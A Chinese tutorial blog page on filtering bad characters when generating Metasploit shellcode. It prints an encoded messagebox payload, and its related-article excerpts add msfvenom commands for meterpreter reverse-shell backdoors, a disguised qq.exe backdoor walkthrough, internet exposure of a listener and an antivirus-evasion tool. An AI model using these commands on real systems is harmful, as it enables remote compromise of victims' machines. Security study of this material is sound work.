msf生成payload过滤

shellcode学习有两个方向,一个是专心研究跳板ROP之类,另一个是专心研究payload部分。为了分清楚最近的任务,所以先放弃研究shellcode,从msf上直接拿过来用了。

在看rop链的生成原理,都还好,在执行shellcode的时候,发现在执行过程中有问题。仔细查看了下布局之后,发现poc利用中对 bad chars 有截断,需要过滤。使用msfpayload模块默认生成的弹窗根本用不了啊,使用0day2上给的shellcode也是因为坏字符‘0A’的存在。

所以只能使用过滤了。

[email protected]:~# msfconsole
msf > use payload/windows/messagebox
msf payload(messagebox) > generate -b ‘\x00\x0a\x0d‘ -t python
# windows/messagebox - 297 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# TITLE=MessageBox, TEXT=Hello, from MSF!, ICON=NO
buf =  ""
buf += "\xb8\xdc\xa5\x17\xe0\xda\xcd\xd9\x74\x24\xf4\x5b\x33"
buf += "\xc9\xb1\x44\x31\x43\x14\x03\x43\x14\x83\xeb\xfc\x3e"
buf += "\x50\xce\x0b\x25\x42\x85\xef\xad\x44\xb4\x42\x3a\x96"
buf += "\xf1\xc7\x4f\xa9\x31\x83\x39\x46\xb9\xe5\xd9\xdd\xfb"
buf += "\x01\x6a\x9f\x23\x99\x5a\x58\x6b\x85\xd7\x6b\x2a\xb4"
buf += "\xc6\x73\x2c\xd6\x63\xe7\x8b\x33\xf8\xbd\xef\xb0\xaa"
buf += "\x15\x68\xc6\xb8\xed\xc2\xd0\xb7\xa8\xf2\xe1\x2c\xaf"
buf += "\xc7\xa8\x39\x04\xa3\x2a\xd3\x54\x4c\x1d\xeb\x6b\x1e"
buf += "\xda\x2b\xe7\x58\x22\x64\x05\x66\x63\x91\xe2\x53\x17"
buf += "\x41\x23\xd1\x06\x02\x69\x3d\xc8\xff\xe8\xb6\xc6\xb4"
buf += "\x7f\x92\xca\x4b\x6b\xa8\xf7\xc0\x6a\x47\x7e\x92\x48"
buf += "\x8b\xe0\xd9\x23\xbb\xcb\x09\xca\x59\x82\x73\xa5\x2f"
buf += "\xdb\x7d\xda\x62\x0c\x1e\xdd\x7c\x33\xa9\x67\x87\x77"
buf += "\xd7\xbf\x65\xf4\xa0\x5c\x4e\xa9\x46\xd2\x71\xb2\x69"
buf += "\x62\xc8\x45\xfd\x19\xbf\x75\xbc\x89\x0c\x44\x10\x2e"
buf += "\x1b\xdd\x1f\xcb\xa9\x95\x83\x37\x44\x2f\xdd\x6e\xa7"
buf += "\x7a\x25\x06\x95\xd5\x9e\xb0\xb8\x9b\x5c\x47\xa0\x07"
buf += "\xce\xa0\xb8\xb8\x11\xcf\x53\x28\x95\x68\x84\xde\x04"
buf += "\xee\xa1\x5c\xae\xbd\x4c\x12\x5d\x0f\x54\x5c\xfd\x4b"
buf += "\x60\xd4\x1e\xfb\x2c\xc6\xc0\xdc\xa4\x4b\x53\x5b\x14"
buf += "\x3c\x21\x0c\x3b\x9c\xad\xbd\xef\xfc\x4b\x2a\xb8\x99"
buf += "\xff\xc6\x09\xab\x77\x5a\x4e\x3b\x0e\x82\xbf\xe9\x42"
buf += "\x16\x91\x5f\x9d\x48\x20\xa0\x31\x96\x16\x28"

点击链接查看generate的正确姿势click me

时间: 2024-08-09 06:27:08

msf生成payload过滤的相关文章

MSF常用payload生成

两种方式 msf生成的payload分为正向和反向两种,正向需要正向连接,反向需要反向连接,反向是最常用的方式 正向连接指被攻击的目标机器通过正向的payload打开一个端口,攻击者的机器去连接目标机器的这个端口,从而建立连接 如果把攻击机器比喻成你,目标机器比喻成妹子,正向连接相当于你去追追妹子,最后建立了连接,两者可以互相通信 反向指攻击者的机器打开一个端口,目标机器运行反向payload来连接攻击机器的端口,从而建立连接 用上面的比喻,反向连接相当于妹子来追你,最后建立了连接,相互通信 使

metasploit framework(四):生成payload

RHOST是限制来源IP,这里不用修改 generate生成payload 假设'\x00'是坏字符,生成payload时就会对'\x00'进行编码,排除坏字符. -b 去掉坏字符 -t 指定生成的格式 -i 编码几轮 -k 生成过程中不会启动新的进程 -x 使用的模板文件,在模板文件中注入payload -f 输出的路径 就生成了一个1.exe的文件

msf下的各种生成payload命令

Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give you a shell in almost any situation. For each of th

msf生成各个平台payload

一.payload 1.windwos msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -a x86 --platform Windows -f exe > shell.exe   msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f exe > shell.exe 2.liunx msfve

msf生成后门拿shell

0X01简介 这里我本来想学习 msf利用漏洞反弹shell的 但是 没有靶机....等找了靶机在弄吧 kali 172.18.5.118 靶机  172.18.5.240 先尝试能不能ping通 好的可以 那我们进行下一步 0X01爱之初体验 先在kali终端输入msfvenom -l,打开payload目录 然后找到payload windows/meterpreter/reverse_tcp 输入以下命令生成后门qq.exe 然后将生成的qq.exe移到靶机中,然后打开msfconsole

MSF生成被控端并上线

被控端生成:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.139 LPORT=2345 -f exe > /root/yangtest.exe msf配置如下当被控端运行后即可上线:msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcppayload =>

Kali的内网变外网

到 https://natapp.cn/#download 下载客户端(根据自己的系统下载),然后注册一下用户,需要实名认证,然后开一下隧道 下载完成后,解压文件,并打开文件夹 然后运行,输入命令./natapp -authtoken=********6a49 (这里是隧道的id,根据自己的填写) 这样就成功地把内网的kali转发到外网了,然后ping一下地址 这个ip地址就是外网地址,端口为42657,这个有点不好的地方,就是端口会更变,导致木马连接会断线 用msf生成payload的时候要把

AVIator -- Bypass AV tool

前提概要 项目地址:https://github.com/Ch0pin/AVIator AV:全名为AntiVirus,意指为防病毒软件 AVIator是一个后门生成器实用程序,它使用加密和注入技术来绕过AV检测.进一步来说: 它使用AES加密来加密给定的shellcode 生成包含加密有效负载的可执行文件 使用各种注入技术将shellcode解密并注入目标系统 便携式可执行注入,包括将恶意代码直接写入进程(没有磁盘上的文件),然后使用其他代码或通过创建远程线程调用执行.注入代码的位移引入了重新

生成常用的msf

生成msf常用payload msf作为一款强大的漏洞检测工具,如何生成适用于msf的payload以及如何利用是使用msf的关键,今天就主要记录一下常用的payload以及如何使用.生成payload使用的工具是MSFVenom,下面看看他的帮助信息. 在kali下可以使用如下命令列出MSFVenom可以生成的payload列表: msfvenom -l 生成二进制文件 关于二进制文件,主要介绍适用于Windows.linux.mac操作系统的payload生成与利用. Windows msf